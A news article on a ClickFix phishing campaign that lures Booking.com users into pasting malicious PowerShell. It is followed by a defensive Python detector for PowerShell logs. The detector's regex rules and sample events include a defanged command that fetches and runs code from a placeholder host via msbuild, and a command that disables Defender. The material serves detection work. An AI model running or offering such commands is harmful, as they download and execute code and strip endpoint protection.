Used Booking.com lately? You might have accidentally installed malware


Russian hackers have crafted a new “ClickFix” social engineering campaign targeting Booking.com users, tricking victims into installing malware using fake CAPTCHAs and a simulated Blue Screen of Death.


According to new research published by Securonix, the campaign appears to be a stealthy reboot of an earlier version seen months ago, with threat actors evolving their tactics to avoid detection and maintain long-term access.


Nicknamed “PHALT#BLYX,” the updated ClickFix campaign tricks victims into executing malicious PowerShell commands that silently fetch and execute remote code. “This happens via multi-stages involving powershell, proj files and msbuild,” Securonix says.

With prices shown in euros and malware written in Russian, researchers believe a Kremlin-aligned threat actor focused primarily on European targets is behind this particular activity.

clickfix phishing attack
Image by Cybernews.

ClickFix is a social engineering technique that surged in 2025 by exploiting users’ familiarity with CAPTCHAs and verification prompts, tricking them into running malicious scripts themselves to deliver malware.

The method has been linked to multiple ransomware campaigns, including incidents affecting US public-sector organizations, according to the Center for Internet Security, which tracked several ClickFix campaigns throughout last year.

Luring victims during busy holiday travel season

The campaign begins with a phishing email that appears to be from Booking.com, alerting the recipient to a “cancelled reservation” from the online discount travel agency.

The cancelled reservation also “prominently displays” a significant financial charge – often over a thousand euros – creating “a sense of urgency and panic” for the victim to “investigate immediately,” the Securonix blog states.

Booking.com Click-Fix attack 1
Image by Securonix.

If the recipient clicks the “See Details” link button to find out more, they are redirected to a fake Booking.com page that shows a deceptive “loading error,” prompting the user to click a fake refresh button.

What stands out in this campaign is how aggressively it exploits panic and combines that with financial pressure, trusted branding, and a fake system failure to push victims into bypassing safeguards themselves.

Securonix also notes that abusing the Booking.com brand is a well-known tactic among sophisticated threat actors.

Booking.com Click-Fix attack 2
Image by Securonix.

“Threat actors have historically compromised hotel accounts to message guests directly, or send phishing emails to hotel owners via fake inquiries,” including targeting hotels with special requests, such as allergies or other food restrictions.

What’s more, the phishing email and bogus Booking.com site (observed as low-house[.]com) are practically indistinguishable from the real site, mimicking the travel agency’s branding, color palette, logos, and font styles, the researchers say.

Clicking the fake refresh button triggers a fake “Blue Screen of Death” (BSOD) animation that then instructs the user how to “fix the issue.”

The “fix” involves tricking the victim into manually pasting “a malicious script into the Windows Run dialog,” which executes the malware.

Booking.com Click-Fix attack 3 - BSOD
Image by Securonix.

“This technique is particularly dangerous because it relies on the user’s own hands to bypass security controls that would normally block automated script execution,” Securonix says.

The malware then disables the user's Windows Defender, establishing a persistent presence and connecting to a Command and Control (C2) server run by the threat actor.

Combating ClickFix attacks

Securonix presents multiple recommendations to break the infection chain. These include increasing user awareness and educating hospitality employees on the “ClickFix” tactic and the dangers of pasting script code into the Windows Run dialog.

Researchers also suggest bolstering social engineering defenses. Be cautious when receiving emails claiming to be from Booking.com or other online hospitality services, especially those that make urgent financial demands.

Furthermore, users are urged to verify requests through official channels rather than clicking links.


Other actions geared towards defenders include monitoring systems for “Living off the Land” binaries and legitimate system binaries for unusual behavior, as well as monitoring for suspicious file type creation and enabling PowerShell Script Block Logging to capture and analyze the contents of executed scripts.
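As an added example (not from the article or from Securonix), the Python below triages PowerShell Script Block Logging (Event ID 4104) text for the chain described above: hidden or policy-bypassing PowerShell, a remote fetch, a dropped .proj file, msbuild.exe, and Defender tampering. The rule names, weights, alert threshold and sample events are constructed for illustration, and the host name is a placeholder.

```python
"""Score Script Block Logging (Event ID 4104) text for the ClickFix chain:
PowerShell -> remote fetch -> .proj file -> msbuild, then Defender tampering.
Hypothetical detection logic; rules and samples are constructed, not Securonix's."""
import re
from typing import Dict, List

# (name, weight, case-insensitive pattern). A single high-weight hit such as
# Defender tampering alerts on its own; weaker signals must co-occur.
RULES = [
    ("hidden_or_bypass_flags", 2, r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass|-nop\b"),
    ("remote_fetch", 2, r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b"),
    ("proj_file_dropped", 3, r"\.proj\b"),
    ("msbuild_invoked", 3, r"\bmsbuild(?:\.exe)?\b"),
    ("defender_tampering", 5, r"set-mppreference\s+-disable|add-mppreference\s+-exclusion"),
]
COMPILED = [(n, w, re.compile(p, re.IGNORECASE)) for n, w, p in RULES]
ALERT_THRESHOLD = 5  # msbuild alone (a normal developer build) stays below this

def score_script_block(text: str) -> Dict[str, object]:
    """Return the matched rule names, their summed weight and the alert decision."""
    hits = [n for n, _, rx in COMPILED if rx.search(text)]
    score = sum(w for n, w, _ in COMPILED if n in hits)
    return {"score": score, "hits": hits, "alert": score >= ALERT_THRESHOLD}

def triage(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return an alert record for every 4104 event whose ScriptBlockText crosses the threshold."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        result = score_script_block(str(ev["ScriptBlockText"]))
        if result["alert"]:
            alerts.append({"record": ev["RecordId"], **result})
    return alerts

# Constructed sample export (not real telemetry). Record 102 mirrors the shape
# of the chain in the article, using a placeholder host; 104 is a benign build.
SAMPLE_EVENTS = [
    {"EventID": 4104, "RecordId": 101, "ScriptBlockText": "Get-ChildItem $env:USERPROFILE\\Documents | Measure-Object"},
    {"EventID": 4104, "RecordId": 102, "ScriptBlockText": "powershell -w hidden -ep bypass -c \"iwr hxxp://placeholder[.]invalid/x -OutFile $env:TEMP\\r.proj; msbuild $env:TEMP\\r.proj\""},
    {"EventID": 4104, "RecordId": 103, "ScriptBlockText": "Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"EventID": 4104, "RecordId": 104, "ScriptBlockText": "msbuild .\\MyApp.sln /t:Build"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Running it against the constructed export alerts on records 102 and 103 only; the benign developer build in record 104 scores 3 and is left alone.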

Researchers say the campaign highlights a broader trend toward “hands-on” social engineering attacks that rely on users to bypass protections themselves.

As ClickFix techniques continue to resurface in updated forms, defenders are likely to see similar lures reused across other trusted consumer platforms.

Earlier Cybernews coverage flagged ClickFix lures using fake Windows update screens to trick users into executing malicious code, showing how the technique continues to resurface with new twists across trusted brands and interfaces.

